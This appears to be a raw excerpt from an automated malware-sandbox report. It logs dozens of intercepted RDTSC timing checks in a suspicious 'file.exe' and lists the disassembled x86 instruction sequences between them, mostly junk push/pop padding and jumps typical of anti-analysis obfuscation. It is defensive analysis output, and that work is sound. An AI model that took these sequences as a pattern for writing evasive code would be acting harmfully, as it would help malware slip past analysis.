Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90B1B6 second address: 90B1CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBFh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909A56 second address: 909A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 909A5A second address: 909A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DA25 second address: 90DA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DA29 second address: 90DA2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90DA2D second address: 90DA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6D1959691Eh 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912AE9 second address: 912AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6D18BC6CB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 912AF3 second address: 912AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DBF61 second address: 8DBF72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DBF72 second address: 8DBF77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DBF77 second address: 8DBFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CC3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F6D18BC6CBDh 0x00000012 movsx edi, si 0x00000015 pop edx 0x00000016 lea eax, dword ptr [ebp+12490CFFh] 0x0000001c jmp 00007F6D18BC6CBBh 0x00000021 mov edi, dword ptr [ebp+122D2CCEh] 0x00000027 nop 0x00000028 push edi 0x00000029 js 00007F6D18BC6CB8h 0x0000002f push eax 0x00000030 pop eax 0x00000031 pop edi 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F6D18BC6CB6h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DC4B2 second address: 71EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F6D19596927h 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 add dword ptr [ebp+122D22EBh], esi 0x00000017 push dword ptr [ebp+122D055Dh] 0x0000001d mov edi, dword ptr [ebp+122D2D5Eh] 0x00000023 call dword ptr [ebp+122D37D9h] 0x00000029 pushad 0x0000002a xor dword ptr [ebp+122D23F2h], esi 0x00000030 xor eax, eax 0x00000032 xor dword ptr [ebp+122D23F2h], edi 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jp 00007F6D19596922h 0x00000042 mov dword ptr [ebp+122D2B16h], eax 0x00000048 clc 0x00000049 je 00007F6D1959691Ch 0x0000004f mov dword ptr [ebp+122D23F2h], edx 0x00000055 mov esi, 0000003Ch 0x0000005a pushad 0x0000005b mov edx, dword ptr [ebp+122D2C1Ah] 0x00000061 mov dword ptr [ebp+122D36FEh], edi 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D1CD6h], ebx 0x00000072 lodsw 0x00000074 mov dword ptr [ebp+122D23F2h], edx 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e jmp 00007F6D19596921h 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 pushad 0x00000088 mov dword ptr [ebp+122D36FEh], edi 0x0000008e mov dword ptr [ebp+122D36FEh], eax 0x00000094 popad 0x00000095 nop 0x00000096 push esi 0x00000097 pushad 0x00000098 push edi 0x00000099 pop edi 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DC62C second address: 8DC632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DC6F4 second address: 8DC6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DCA76 second address: 8DCA93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D18BC6CC2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DCA93 second address: 8DCA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DD168 second address: 8DD16E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DD23D second address: 8DD264 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push edx 0x0000000a mov dword ptr [ebp+122D1F89h], edx 0x00000010 pop edx 0x00000011 lea eax, dword ptr [ebp+12490CFFh] 0x00000017 mov ecx, dword ptr [ebp+122D2CB6h] 0x0000001d nop 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F6D19596916h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DD264 second address: 8B9457 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6D18BC6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F6D18BC6CBBh 0x00000011 nop 0x00000012 mov cx, DCEDh 0x00000016 call dword ptr [ebp+122D227Bh] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911E1B second address: 911E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D1959691Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D1959691Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911E3B second address: 911E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911E3F second address: 911E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911F81 second address: 911F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D18BC6CBDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9120F0 second address: 912101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D1959691Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91226A second address: 91227D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6D18BC6CB6h 0x0000000a popad 0x0000000b jo 00007F6D18BC6CBEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9123DC second address: 9123E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9123E0 second address: 9123F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9123F6 second address: 9123FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915DBA second address: 915E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F6D18BC6CCCh 0x00000011 jmp 00007F6D18BC6CC4h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915E03 second address: 915E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CB2D second address: 91CB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CBEh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F6D18BC6CC7h 0x00000013 pop edi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CB5F second address: 91CB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CB64 second address: 91CB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CCC5 second address: 91CCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE0F second address: 91CE22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE22 second address: 91CE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE2D second address: 91CE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F6D18BC6CC8h 0x0000000f push ebx 0x00000010 jmp 00007F6D18BC6CBAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D5FE second address: 91D604 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91D604 second address: 91D60F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6D18BC6CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91DA6A second address: 91DA83 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6D19596922h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91DA83 second address: 91DA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91DA89 second address: 91DACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F6D1959691Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6D19596926h 0x00000017 popad 0x00000018 pushad 0x00000019 jno 00007F6D19596916h 0x0000001f je 00007F6D19596916h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9200E7 second address: 9200EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9200EB second address: 920103 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6D1959691Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91FC19 second address: 91FC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F6D18BC6CC5h 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6D18BC6CC2h 0x00000016 push edi 0x00000017 jmp 00007F6D18BC6CBAh 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91FC58 second address: 91FC5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C44 second address: 922C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C48 second address: 922C56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C56 second address: 922C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C5A second address: 922C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C5E second address: 922C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922C64 second address: 922C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6D1959691Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92792C second address: 927930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 927930 second address: 927938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 927938 second address: 92798F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6D18BC6CC3h 0x0000000a popad 0x0000000b jg 00007F6D18BC6CD0h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6D18BC6CBFh 0x0000001a jmp 00007F6D18BC6CBBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92798F second address: 927995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D2B1 second address: 89D2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D2B5 second address: 89D2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D2BB second address: 89D2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 jp 00007F6D18BC6CB6h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D2D0 second address: 89D2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89D2DA second address: 89D2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jl 00007F6D18BC6CB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92A83C second address: 92A842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929F56 second address: 929F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929F5F second address: 929F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596923h 0x00000007 jmp 00007F6D1959691Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92A20D second address: 92A21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6D18BC6CB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92F6A4 second address: 92F6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DCCC9 second address: 8DCCF3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D18BC6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c jnp 00007F6D18BC6CC0h 0x00000012 push 00000004h 0x00000014 and di, 3C00h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DCCF3 second address: 8DCCF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DCCF7 second address: 8DCCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92FD5D second address: 92FD82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596922h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F6D19596916h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938B06 second address: 938B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938B11 second address: 938B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938B15 second address: 938B1F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6D18BC6CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8930F7 second address: 89311F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F6D1959691Dh 0x0000000f pop esi 0x00000010 push ecx 0x00000011 push ecx 0x00000012 jmp 00007F6D1959691Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C67 second address: 936C7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007F6D18BC6CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F6D18BC6CBCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C7F second address: 936C84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936C84 second address: 936C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 je 00007F6D18BC6CB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936E3D second address: 936E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 jc 00007F6D19596916h 0x0000000d jns 00007F6D19596916h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937978 second address: 93797E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93797E second address: 937984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C0D second address: 937C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CC8h 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C30 second address: 937C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C34 second address: 937C3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6D18BC6CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C3E second address: 937C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6D19596927h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C62 second address: 937C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F6D18BC6CB6h 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9381D3 second address: 9381D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9381D9 second address: 9381F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6D18BC6CC0h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9381F7 second address: 938217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6D19596916h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F6D1959691Bh 0x0000001a rdtsc
